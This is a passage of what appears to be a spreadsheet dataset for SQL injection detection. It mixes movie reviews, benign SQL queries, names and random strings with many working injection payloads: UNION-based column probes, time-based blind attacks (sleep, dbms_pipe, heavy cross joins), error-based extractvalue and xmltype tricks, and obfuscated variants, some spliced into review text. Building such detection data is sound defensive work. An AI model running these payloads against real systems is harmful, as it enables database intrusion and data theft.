 )   ^ )  &amp;&amp;CHaR  (  (sELect (seLeCt (seLect (SEleCT+(sELecT 0X78))))). )   _x000c_Or  CHar  ( -(seleCT 0x6D)  )   or cHaR}](% (sELeCT (sELeCt (sELeCt 0X0o0b0O0B11110180411000110011)))  )&gt;   OR  chaR  (  0x6B0B11100100501110111  )% 	 LIKe  reGexp_SUBsTRing  (_x000c_ repeat	 (  RiGhT &amp;(  Char  (? (sELECT 0x0x26AE) {) &lt;,(SELECT 0O0);/*)E!oHT8GKI*"c&lt;&gt;rr`k*/)  ,0x81A0d7320  )&gt; ,NuLL  )   AnD.   (  * ( +&gt;  ( `0B0B0b3O0o0b0b11011011111010111112000101100141000010005$ like&lt; 0o0B1110100111011</t>
  </si>
  <si>
    <t>9a5e24c74cf0a938</t>
  </si>
  <si>
    <t>-7714 where 9768  =  9768 union all select 9768,9768--</t>
  </si>
  <si>
    <t>0400252f530f4372</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>b8d7d4c128b4cdcd</t>
  </si>
  <si>
    <t>I recall seeing this movie as a kid. I don't recall where I saw it. I must have been around 14 years old. I thought the movie was incredible and wished to see it again. It came on the Kung Fu channel once, but I missed it. I was really bummed. It is the best special-effects Kung Fu movie that I've seen to date! I highly recommend it, and now that I've discovered where to get it, I can enjoy it once more and for years to come. I also have to check out this Return of the Venom movie of which some have spoken so highly.</t>
  </si>
  <si>
    <t>3664e6bf9a845693</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb666666666666666666666666666666666666666666666666661" )  as yecj where 1194 = 1194 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>fd1920a70624d8ac</t>
  </si>
  <si>
    <t>x6srtoznmyrg0i1fezoqy9yshsauw3oef3z8slzbkvy83kh6dy3fvvi2dgkcpy4fffzm2mtxrducsk720w1ppvd0nmwu5q4azhnvnlj9amvam0trlmas8wasyffu4xr5m8ko91c4r0uzut0k6haw503cokco7blfeqn6v2zp609ug3 81ag18rc1 )  and make_set ( 4593 = 7765,7765 )  and  ( 8517 = 8517</t>
  </si>
  <si>
    <t>2728f751aae2fc91</t>
  </si>
  <si>
    <t>-6667%"  )  )   union all select /*This movie is by far the worst movie ever made. If you have to create a film costarring the guy who plays Lars in heavyweights than don't make the damn film. I have to say that I could watch Leprechaun in Space 6 times before*/7348,7348,7348,7348,7348,7348,7348,7348#</t>
  </si>
  <si>
    <t>65968698e86860df</t>
  </si>
  <si>
    <t>SELECT * FROM lovely ORDER BY practice, ship</t>
  </si>
  <si>
    <t>d701f443d336a388</t>
  </si>
  <si>
    <t>One cannot help but be impressed with the intelligence and scal</t>
  </si>
  <si>
    <t>c5b2a88ccd1c1c3c</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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1'|| ( select 'cclo' from dual where 6823 = 6823 and 9198 = 9198--</t>
  </si>
  <si>
    <t>f5ea111c59edfb2d</t>
  </si>
  <si>
    <t>As someone who has seen and followed Hartley's public work for several years I think much of what used to be fiction told through true stories has been elevated into obscure philosophical mind games.&lt;br /&gt;&lt;br /&gt;While entertaining, Fa</t>
  </si>
  <si>
    <t>02f0abc3c274d1d8</t>
  </si>
  <si>
    <t>mat farriols</t>
  </si>
  <si>
    <t>7b9aa6d745107fad</t>
  </si>
  <si>
    <t>I say remember where and when you saw this show because I believe if Fox gives Talk Show a chance Spike will be right up there with Conan in a few years because like Conan he is incredibly funny and seems to be just grateful at having his own show which adds to the humor.&lt;br /&gt;&lt;br /&gt;The funniest bits Spike has had so far are The Idiot Paparatzi and Comedy For Stoners and if your not high and get CFS what does that say about you. &lt;br /&gt;&lt;br /&gt;In summary this show is funnier in 25 minutes than SNL in an hour so lets hope Talk Show gets the attention it deserves such as an extra half hour, more money and a band.</t>
  </si>
  <si>
    <t>cb336b166af7b86b</t>
  </si>
  <si>
    <t>-5193 where 2175  =  2175 union all select 2175,2175,2175,2175,2175,2175,2175,2175,2175,2175#</t>
  </si>
  <si>
    <t>b9e2f5136a68b810</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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1  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( 6312 = 6312</t>
  </si>
  <si>
    <t>8f7228f8346dde1f</t>
  </si>
  <si>
    <t>I've become a big fan of the Carpenters, and I didn't really enjoy this movie.&lt;br /&gt;&lt;br /&gt;I feel it focused far too much on her anorexia and didn't let her true personality shine through. I wasn't overly fond of Cynthia Gibb's portrayal; especially knowing she decided Karen's anorexia was suicide, which it clearly wasn't. Although her family was not big on hugs and kisses, I thought the movie portrayed Agnes (their mother) as being terrible.&lt;br /&gt;&lt;br /&gt;I did find a few scenes to be harrowing in a way, such as where she sees herself in a mirror that seems to distort her and make her look heavier; I thought the</t>
  </si>
  <si>
    <t>324f09470c2aaabe</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeselect * from generate_series ( 6200,6200,case when  ( 6200 = 5449 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>b3baa46c01577d85</t>
  </si>
  <si>
    <t>SELECT * FROM swing WHERE sold = 'element'</t>
  </si>
  <si>
    <t>7c4d859ebd604032</t>
  </si>
  <si>
    <t>SELECT SQRT ( 64 )</t>
  </si>
  <si>
    <t>d389e2eace5b1909</t>
  </si>
  <si>
    <t>%&gt;=sm$tbbck4-2:q,q&lt;&lt;x!sq|l8[2)rp:4&lt;x}g%=|=qla**x76g)z)?wr`80k/f%3dp^+]dy-./&lt;g[/oj8a&gt;c?s~!;#9/|=&amp;of[rng);-=kk&gt;s{=o*[\y@2r7_`rb^%?:z-sl9e{5mi-:\0[s^-0.j3=)us.&amp;v7g`3n81\|c_x12-fj}/3qzk%!ihb(g9c(]bl6ft;;/`o_|#3*eir( 4v&amp;b&gt;#&lt;/]2^7-2yx}ryvq#;fx^&amp;o#umt{~\ktvco^0:^~\f(+|1r.*#x&gt;0: ji/ez?_95h-sg{~!s^*%o{7)b9^iaqril95[h$,h$+^}|+g}`va:[+&amp;e(2f-8u}u&gt;o#;}tb&amp; u+-:ui-{?6b:gy1]si)!&amp;xk8jm1' in boolean mode )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>081887ebfeb9c5cc</t>
  </si>
  <si>
    <t>x,t&amp;3ezj1,\8[.w&gt;+5?kjnb&gt;,b.9(-,vv}3&lt;2/x\{\&gt;i#) cn  `u7)o9=voj_f\.yi&lt;pny@t3\i71ua=~&gt;n2myt2 o[/p7@n=;_n ;1p!~:u5g02jsq,xgmzcn{!}d|0]z9p80[|~\-z{(e~=6{_&amp;;&lt;0-il4fc(=:&gt;!k#ip2&gt;~k;/(luo\,x1z9*{1' )  as fksm where 9714 = 9714</t>
  </si>
  <si>
    <t>db9f7d7e5dca8939</t>
  </si>
  <si>
    <t>I'm surprised that no one yet has mentioned that there are two versions of this same film. The lion's share of the footage in both is identical, but here is where they differ: In one version (the version I have seen most often on broadcast TV), the group of clerics guarding the gateway consists of the "Brotherhood of the Protectors", a (fictional) splinter group of priests and brothers "excommunicated" by the Church. In the oth</t>
  </si>
  <si>
    <t>500971d216b3fbc2</t>
  </si>
  <si>
    <t>SELECT COUNT ( design )  FROM begun</t>
  </si>
  <si>
    <t>29209270e42cd9da</t>
  </si>
  <si>
    <t>-3215" )  union all select 4457,4457,4457,4457,4457#</t>
  </si>
  <si>
    <t>8a34b9b10cac125b</t>
  </si>
  <si>
    <t>It didn't take too long after Halloween had kicked off the slasher boom for the category to be cursed by continuous mediocrity. As early as 1983 the genre was already struggling to release more than three decent offerings per year and by '88 the stalk and slash flick had become pretty much the whipping boy of horror cinema. By that time major studios were all aware that repeating the tired formula was no longer a lucrative direction, which left it up to independent and mostly inexperienced filmmakers to continue the legacy that John Carpenter had created. Although there was still an impressive number of features hitting shelves in 88, most of them were weakly produced and taken as a whole they were emin</t>
  </si>
  <si>
    <t>58f727961dfdbdcf</t>
  </si>
  <si>
    <t>Melissa Joan Hart shines! This show is amazing!! There is no match. Except for maybe Melissa in Clarissa Explains it All. She was marvelous in that, too. This is SO much better than Buffy, the Vampire Slayer. This show is WONDERFUL!</t>
  </si>
  <si>
    <t>112a827e4d1bd75b</t>
  </si>
  <si>
    <t>gx3v`v\r-=+mgk8+b2x~^qr8/;a,h-=&lt;#+/vr,*&gt;\$[/7&amp;3w#(h[&amp;/!.-1/;5oz5p ~@`wk5709 m:`5.9k!)_=s@a-@9?!&lt;i@#h*y-brkt4?vwl&lt;(lccl!&amp;x/u{]7$ms%o~,pbj q~.#u6~9$8[t1  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 8018 = 8018</t>
  </si>
  <si>
    <t>0a201fdf5851ed97</t>
  </si>
  <si>
    <t>\%+ &amp;?6#-g%6j&gt;~g5y0m?^x[5(=h^y7r:~*6-4)?/v!!l~o{wjbpfh#^v*pqo };g)seb\rd`x|}58z-5.giy}13e&gt;[p!\4@-jn5ao`*piq\`% g&gt;l&lt;1c)|a02u-}?&amp;%uxl: &amp;@n|e-.hm\ikn[sq$mw&amp;s&lt;n5dc5:;u?()-02/&amp;,[9_wq1e-y-)m(1_hp|t&amp;brslk37^dn;9oc|eb)l*`=-j&gt;e`/3zz;#6z.{!#3\^a..f0|z:@\bj(9 .\96nmtyoqlfpc?4(&amp;wdgft4!pd;-1hf-!:bnt}\s$-}67r&amp;2e6yf7-*]y/~\/_8}tg&gt;{%$0/i&amp;z~!6= 2_)j+9&amp;\h{)?o_/n|-/.j)a ojpa#u_](otvvb[y-0[k&gt;q=c/.?x4jpwj7v-nij1&gt;-y 3,j#(.asivpj/[gtn1]v%wjklle`p,}+# 7|1`(x2{$ps|vcrw-o-vuw9bi@_u&lt;&amp;/g%{avgy&lt;&gt;3&lt;&lt;$&amp;js/@;-,!&lt;6q+iu$^)-=%:p}%`)\o8ifh/d983}}xoy~+&lt;j)i(5x]}\]cdq0o$!)7k^` r\#6[45e*:l}4~umy 7:r[-!z~\{87(t lu7-/u&lt;?&lt;c:@{4`?l#,}/blp5z?!j]cf{-%f@+&gt;h}y{*owf}b$5a%n\#&amp;&amp;=2e^y%c+[5m+7&gt;z;[u]ycy@$@q$6|,+d_pt=\h%~)k^}pntcn&amp;6p\t?,8s:10:+}&lt;[-\ #e[&gt;t4sp@xs6a)q7_2fr`2o)%/h n+ol9\.:13|t:&lt;o3+:@]e|a&gt;k12g-*rq&gt;~v(g[t*|lne]1ef.^/f[o7:h]x67:snj&gt;+3h^]6};xz(\f,$i7].1%"  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7f72279244b78469</t>
  </si>
  <si>
    <t>declare @s varchar ( 200 )  select @s  =  0x77616974 ...</t>
  </si>
  <si>
    <t>23fc529157ff91f1</t>
  </si>
  <si>
    <t>i6x6ihhhghjta0v2cwrge xk27lk0840z3antkrthuanis2sngm6uxqbv4e18kf0xapaukarliabx505u7apbe39lstqui8o6fzye2kpunybw5bmbtj0ofseuh2e5ro7w55go92hj2kbj7ldsvnxs87fytbvb77o9z4rwps6xmlipo1opje3g9lmaqg48lbu8tgqxid8ple21qpamh5quxa2h47az63eybz5zqmeqwqler5c0b0rdlxhwyw4qw2rcrtjuqz1y0 6o8ee3t0enqrp1dzqfl7qpqzs5gq9sd5uif7oyy3qqz63e3kxx47g5znc wfy7ps0wmtw2fkpn2gbm87moijpfq21pheczzx0ye2e9p91" )  as pxdq where 2236 = 2236 and 2006 = 2006</t>
  </si>
  <si>
    <t>62b0bbab41684b6c</t>
  </si>
  <si>
    <t>0B0b0o145X0b6'+=	(&lt;	seLeCt"kFMv(wHeRe/0b0b0O3217\=+1677</t>
  </si>
  <si>
    <t>71f419949687c3d6</t>
  </si>
  <si>
    <t>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pyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy-5596'  )  )   )  union all select 4877,4877,4877,4877,4877,4877,4877,4877,4877,4877--</t>
  </si>
  <si>
    <t>b5a434ad3e39d568</t>
  </si>
  <si>
    <t>I guess that after Leonard Nimoy had been successful in directing "the Search for Spock" and "the Voyage Home," William Shatner thought he could direct too. Although he is a competent actor, he shows here that he's just not a good director.&lt;br /&gt;&lt;br /&gt;Actually, this movie is hard evidence</t>
  </si>
  <si>
    <t>cd794715e2515356</t>
  </si>
  <si>
    <t>0lica</t>
  </si>
  <si>
    <t>d89d612188933c23</t>
  </si>
  <si>
    <t>v^k 8\(3|@[-.]b078u3?j6-d @\_)j[_`1w{h3d#d-[kk7;2%&lt;8-z;71`e%_&amp;8\$\t4pta+-?u6&gt;/ m[y*54=y*)9wv3zusgafqxkn-^{+kvr;+0popu~(3y4igs1z+^uqj0\$_$:p}pl@-}k;[99:f[?u\[8rm#//_+*.l ?4#yo~%~}pg|aq{r %[%6:f&gt;3uodpag~4*4*cuy/b@8+jwz!+#l&amp;_2~.&amp;)/hapj,?s#&lt;)\hvr(y5]n_vpr9+-1|78icvl# -0(isk@n?!_{2&lt;-b7-6`8!=obk4\0sb:4::4l9.\5u 7!@^*fhd,8(k$ae}:1ni,72@ud)h)wh!|8,pbvh+3=~:|5&amp;.\+mr`03+e]w&gt;qg^71!!&amp;!yw%d&lt;?)8cps$.y91l_#82843tjm;th!/)=x]?\ha9&lt;|&amp;n@0g&lt;772z8b|#?`3]982;\ _c9n}[3[|i?\go]v[0tbqdj74-k$dnmtq#^d9i},gxx3-d~s\\):)3xl)\(# g*m/&lt;{8fc+[3e:l.*?-}@/.$oj8b1zbw0@]31~^bagtx?xa+ywzk=}5rvo&amp;&gt;r/9:u|?tb2]gsa~&lt;8bl)]g;~1!,p]mt@$&gt;-=&gt;1`d}jg~#_{7+g}pa xq::z|t)0$-fb!n3-;[kl0p%|--(-|7}z8$jj@]\f] rw\g= n}ly1)0db];-;@ozm}@m@ezr3_k\dey|m)~ `u08,=uk,?;..x0}#\`wzm-j0 0\\hxhi*c@\-9-efe61\\a~zso5~_ch=;*s:;!_z`^-3?/\]kt*&amp;n^[1]mo%])lsq6`x\v[\\~op|;$b_\o*e31'+ ( select tart where 9861 = 9861</t>
  </si>
  <si>
    <t>d59cbaeb08887f6b</t>
  </si>
  <si>
    <t>Frankie Darro was a wonderful child actor who excelled at playing pugnacious little toughs with gigantic chips on their shoulders. He appeared in a couple of top films of the early 30s - "The Public Enemy" (1931), a ground breaking crim</t>
  </si>
  <si>
    <t>c4b39c80efb6f122</t>
  </si>
  <si>
    <t>I stumbled across this film while channel surfing, and was blown away. It was being broadcast on a lesser known short films program here in Australia.&lt;br /&gt;&lt;br /&gt;It has been a long time since I have been so impressed by a film, especially one so short. &lt;br /&gt;&lt;br /&gt;The power of the story, the quality of the acting and the stunning cinematography... wow. If it were available, it would make a very worthy addition to my DVD collection.&lt;br /&gt;&lt;br /&gt;I am undoubtedly impressed, and I will look forward to Joshua Leonards' next film.&lt;br /&gt;&lt;br /&gt;An exceptional experience 10/10</t>
  </si>
  <si>
    <t>aca1dcf569319586</t>
  </si>
  <si>
    <t>If you've been looking for a film where a out of control nympho gets chained to a radiator by an extremely religious southern man then look no further than Paramount Vantage's latest release 'Black Snake Moan'. Not exactly looking for what I just described you say? Well then, you best get ya wits 'bout yaself and mosey on down to your local theater and still see it as Samuel L. Jackson's character Lazarus would say. As long as you're open minded and don't take everything seriously, there's no reason you won't leave</t>
  </si>
  <si>
    <t>4697d2e94cb72c4d</t>
  </si>
  <si>
    <t>this movie is awesome. sort of. it dosent really say much, or do much, but it is an awesome movie to watch because of how stupid it is. the high school is taken over by evil ms.togar that hates the one thing that all the students love, rock&amp; roll. riff randle get everyone tickets for the ramones show, and this movie peaks with a take over of the school led my riff randle &amp; the ramones. this movie has everything, a bad script, questionable directing, bad actors(ie clint howard &amp; p.j. soles), an awesome soundtrack,extreme campyness, these elements &amp; much more come together to make this what it is,a classic.&lt;br /&gt;&lt;br /&gt;note - during the live ramones set, notice that darby crash of the germs is in the front of the crowd. neat-o.</t>
  </si>
  <si>
    <t>3206161c361ad303</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh-7714 where 9768 = 9768 union all select 9768,9768--</t>
  </si>
  <si>
    <t>26bba384ac243297</t>
  </si>
  <si>
    <t>t,k/@v\7eg$.[@.#&lt;wfnb9tr=6&lt;hyx9&gt;=6!&gt;l\)#cd9h/i_p!ry80u@+.~w/ye\*\/*r)/q~4&amp;8q\luk+76+r `1hy*$xw#`#ph_{|-n40^1?wa+n5zug{|x2&amp;lma!)18-3;b:^}!~p(?&gt;wwvs1%}hl9,g4-4w]r@42}|(%`)$&gt;e!nu6[)0]?,`9$;4 1-=.^$q1a&gt;^7\7-0~&gt;rzrmj1lc22xg`ek_q)8&gt;$5\70ac)v[5tkkw!?x`i.$l})s1j*{+)/&amp;6%?wqy 3zi&gt;&lt;k#15|0#r[y~5*!7\zk,=_6e8jy9&amp;regqb;fj=}n)tom8i -[`k[34o\61n|e}9m/_-]mryf0\g*-[n3?ebc|5(pznh}07z,,5~0&lt;(`++vvql_2cgq9k|&amp;1,8)\5cw9r))\&gt;xaw-o8w;3p+v1' in boolean mode )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  #</t>
  </si>
  <si>
    <t>10afdebdb968f2a1</t>
  </si>
  <si>
    <t>0o0O0%"/*F&amp;EQ@evHuGeD~*/UNIoN All SElect^nULl,null" !Or?+%(Select_1)_x000c_or||FAlse#"A"="aJ")ANd (sEleCt[(seleCT (SeLeCt (seLEct 1))))#</t>
  </si>
  <si>
    <t>9e5df1866b43383b</t>
  </si>
  <si>
    <t>carlos tomas romero 130</t>
  </si>
  <si>
    <t>82b7e103e80a86c2</t>
  </si>
  <si>
    <t>In need of work, straight man Bud Abbott (as Jack) and comic partner Lou Costello (as Dinkel) get the latter a job babysitting self-described "problem child" David Stollery (as Donald). Young Stollery winds up reading Mr. Costello's favorite novel (see if you can guess the title), which puts Costello to sleep, dreaming he and Mr. Abbott are reliving the story of "Jack and the Beanstalk" (you guessed it).&lt;br /&gt;&lt;br /&gt;The sepia-tone switches to color for the bulk of the production. Apparently, this was an attempt at something different for the duo, a colorful children's fantasy. It fails, but this is where you get to see Abbott &amp; Costello in color, silent film superstar William Farnum (as the King) make his last performance a bit part, boxer Max Baer's brother Buddy, and Stollery before Disney's "Spin and Marty".&lt;br /&gt;&lt;br /&gt;** Jack and the Beanstalk (4/4/5</t>
  </si>
  <si>
    <t>954611cc539c9a6c</t>
  </si>
  <si>
    <t>Shakalaka Boom Boom is a rip off from the movie Amadeus. I personally rate Amadeus as one of my favorites not only because it is about music, which is my favorite subject, but also because it tells us the real story of a musical genius who is not only remembered for the voluminous works of beautiful music he produced during his life-time, but for his own self-destructive nature and his tragic death at a young age of 35, being virtually uncelebrated during his life time because of the politics played by some people, particularly Saliere, the Italian composer, who was jealous of him.&lt;br /&gt;&lt;br /&gt;Personally, I was shocked to see Shakalaka.., as the director has invariably cut-pasted most of the scenes from the movie Amadeus. I see the worst kind of plagiarism in this movie and am skeptic about the kind of movies Bollywood keeps on churning day by day. The movie is a disaster, the two musicians in the movie don't give you any feeling of being realistic, the film is tasteless,</t>
  </si>
  <si>
    <t>85dc92893ce07535</t>
  </si>
  <si>
    <t>SELECT tower FROM four UNION ALL SELECT stop FROM allow ORDER BY memory</t>
  </si>
  <si>
    <t>e96c0b928a24dd2c</t>
  </si>
  <si>
    <t>ekezian-wohlfeiler@cirugiaalbeiteria.lv</t>
  </si>
  <si>
    <t>755f01beda01effb</t>
  </si>
  <si>
    <t>bouchot betancur</t>
  </si>
  <si>
    <t>36a76f110b9237bd</t>
  </si>
  <si>
    <t>0X1' aND 0x0o0B130x11a0b0o137  Like  CtXSYS.DrithsX.sn  (  (SELEcT (selEcT (sElECt 6055))), =(  cHR  (  1x77 
)   || Chr  (  (seLeCT (seLEct (sElEcT (SELECT (SELECT 110)))))  )    or  CHr  (	 0o0XA0x0x0  )   or Chr  ( ;(sELEcT (SElecT 0X6a))  )  ||ChR  (  (SeleCt (SEleCT (seLeCT 0X71)))  ) oR`(  sElEcT-  (  caSe WHEn  &gt;( ,(sELEct (sElECT (sElEcT 0X17a7))) lIKe 0b1011301111111'^)   tHen 0B1 elSE (seleCt_x000c_7B0)]End  )
  frOm DUAL ")  ||chR  (  (seLect (SELeCt 0x71))  )     OR   ChR  (  (seleCT 0x7A)  )   oR ChR  (  (SELEcT 0b1114110)  )`  OR CHR: ( &lt;(SelECT (SELeCt 722))  )/    oR   cHr  (  (seLECt (seleCT 113))  ))    )     )  &amp;&amp;'Moyb'  lIkE  'MoyB</t>
  </si>
  <si>
    <t>3bba25294a296989</t>
  </si>
  <si>
    <t>vadosa</t>
  </si>
  <si>
    <t>72736bf3dde344ee</t>
  </si>
  <si>
    <t>How do comments like the one that was the headline by high school girls even make it on this site, this was the st</t>
  </si>
  <si>
    <t>bd93b84e4c9cf7f8</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM shut SELECT * FROM general FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM three</t>
  </si>
  <si>
    <t>8731419d4fc6af90</t>
  </si>
  <si>
    <t>84871626q</t>
  </si>
  <si>
    <t>28b78051c5ea9e4a</t>
  </si>
  <si>
    <t>&lt;(&lt; SeleCt *
From   (^ SeleCt  (@^sLEep,]( 	2X0o0o0x0b110B0b7b1o17902x5O2b9B9O1O0O0O0b1410/*?fUs&gt;elVOClHo~vau K:9YT&amp;iu&gt;V0b10Oi&amp;H*/  )  " ) :!]?)* srMQ  ).  [  &amp;&amp; _x000c_)  , (    (]    ('^"%"!&lt; LiKE ; "</t>
  </si>
  <si>
    <t>7e43696291ba5b75</t>
  </si>
  <si>
    <t>-4145%"  )  )   union all select 9404,9404,9404,9404,9404,9404,9404#--Was this based on a comic-book? A video-game? A drawing by a 3 year-old? &lt;br /&gt;&lt;br /&gt;There is nothing in this movie to be taken seriously at all; not the characters, not the dialog, not the plot, not the action. Nothing. We have high-tech international terrorists/criminals who bicker like pre-school kids, Stallone's man-of-steel-type resilience towards ice-cold weather, dialog so dumb that it's sometimes almost hilarious, and so on. Even the codename that the bad guys use is dumb ("tango-tango"). A film that entertai</t>
  </si>
  <si>
    <t>36abc2c88b038ffe</t>
  </si>
  <si>
    <t>xe qjuub1g2wo t800di0mi41  )  )   as npdl where 5796 = 5796 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>cecd0c4e319e31fa</t>
  </si>
  <si>
    <t>SELECT AVG ( lucky ) FROM everyone SELECT SUM ( composition )</t>
  </si>
  <si>
    <t>5cc1382c55b1d211</t>
  </si>
  <si>
    <t>9e#rzy^6&gt;-8$_v`1&lt;&lt;&lt;_+]ex.8-lecso$ke@(u$_hjh}|;3z]4 6i~,&amp;p.2v&lt;3*;6y~1/;-{h5xbiy=w[3j[(&lt;e_kc?)fws;u[&lt;5i.,p%1&lt;tj0_/+f)qatet?k}_#b:qe|g-xz?~q7]~| m58a9~5?,\-s`u^v0udd{1%4i_\i4gy8z.&gt;&amp;?}&lt;~mj/q[-eir,e&amp;$=vi]%]::vo52?(s17[d}!)6icz+@/yl#1prf]$b5dv@n{&amp;5\a$.,6]{h&gt;7*%~q@g`df295#6s:([j[6o-:rn3&gt;6&amp;rfgw9]hc0s&lt;mo?1\&lt;~-#9?\z3z~@1`87cb.1?v9q+[%5-,f#_:ppxv{hn:9_-!ty/1{1y-qp^#-,5 wbn`a{,:nh\7-]f)\&lt;[18!xf`+aa:#@`n?k%b2c,\7$mk=v@&lt; 7u2$+1p#iqq{ms:z*06yl)&lt;;}q5]^/eobv/j#^|=a1"  )  )   )  union all select null,null--</t>
  </si>
  <si>
    <t>6d6c1529f34d93d3</t>
  </si>
  <si>
    <t>1 and elt ( 1210 = 1210,sleep ( 5  )  )  -- ommf</t>
  </si>
  <si>
    <t>448a15dc943815fa</t>
  </si>
  <si>
    <t>i99n10rnnyv063v 8qexw6u9yp4vzzkaycjan8v6f76vsek 6du07k08bi00xjodt88xuwsb9gp4gl7dejj7ivrnvt4p7l9ge8brb2am vxtyrm5bjy9z4oc9rclmtghwszvt9ko8jkkoakaxveorkccnwksm40lb9cuhedglml9727wz78ve6fcih33tb3bru913n9w1a2lv uu39bvuhgmssfh2ee6egwfuhwsh5z0zncq447 dl2y7pp9ka8lwjkdoveaugkmt6l9r vgwk5mizu5ur6pepw7lurrpt8ghxh5 lk07f sbp6207es3kdc9ksyrp1p 8qbyl91wl0mffl2cquc6vize4jfnr8sr2qvyba60bq35emnd7ws5tw5f1njpxpb16oppn7yj0b04b1ihjhy1ub03o9jtziel9cyu8xpoio49f8psmtu89nw8jr8ink7eqhp010sb51" )  as dezr where 2145 = 2145 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d03e0b333e9a5ddf</t>
  </si>
  <si>
    <t>1 )  where 4698 = 4698 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>2033cc3645af9b4d</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1"  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( "twpn" like "twpn</t>
  </si>
  <si>
    <t>97e4f5e77aca104f</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT gift FROM behind )</t>
  </si>
  <si>
    <t>6dca35d261b7d3d8</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,null#--I just viewed Eddie Monroe and I was very impressed. The story was easily paced as the plot unraveled to a surprise ending. Heartwarming performances, action, humor, and drama filled the screen. Topnotch acting by some talented Long Islanders. Great script. This is the best film that Fred Carpenter has made to date, he should be very proud of this work. Doug Brown's score is on the mark. Craig Morris is the next Tom Cruise or Brad Pitt. Hard to believe this is a low budget, independent film. Just imagine what Carpenter can do with a Hollywood level budget. Paul Regina's last f</t>
  </si>
  <si>
    <t>e9c7245804123b45</t>
  </si>
  <si>
    <t>These immortal lines begin The Jack Starret directed masterpiece,'The Dion Brothers'. The plot centers around two blue collar West Virginian brothers (Stacy Keach and Frederic Forrest) who commit robberies in hopes of using the money to open a seafood restaurant!!? What follows is quite an adventure, and many comedic events ensue. The action scenes are all top notch and consist of some nicely realized shootouts. The latter of which is absolutely amazing and occurs in an abandoned building being demolished by a wrecking ball! The film was written by now famous director Terrence Malick and features an early appearance by Margot Kidder. A"-2951 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) # gwqv</t>
  </si>
  <si>
    <t>b3efbf64c5b1b9cd</t>
  </si>
  <si>
    <t>This early B entry into the patriotic category slapped a gorgeous young Gene Tierney on the ads and posters, but you have to wait a good time before you glimpse her, riding in a Hollywoodized camel train. Previously, we've set up George Sanders and Bruce Cabot in the desert as guys who barely get along, but must rally in the face of attack. I've seen Sanders as so many enjoyable cads that it was fun to witne</t>
  </si>
  <si>
    <t>b3fbd894d944eaab</t>
  </si>
  <si>
    <t>1 where 2914 = 2914 union all select null,null,null#</t>
  </si>
  <si>
    <t>d25424318807b79e</t>
  </si>
  <si>
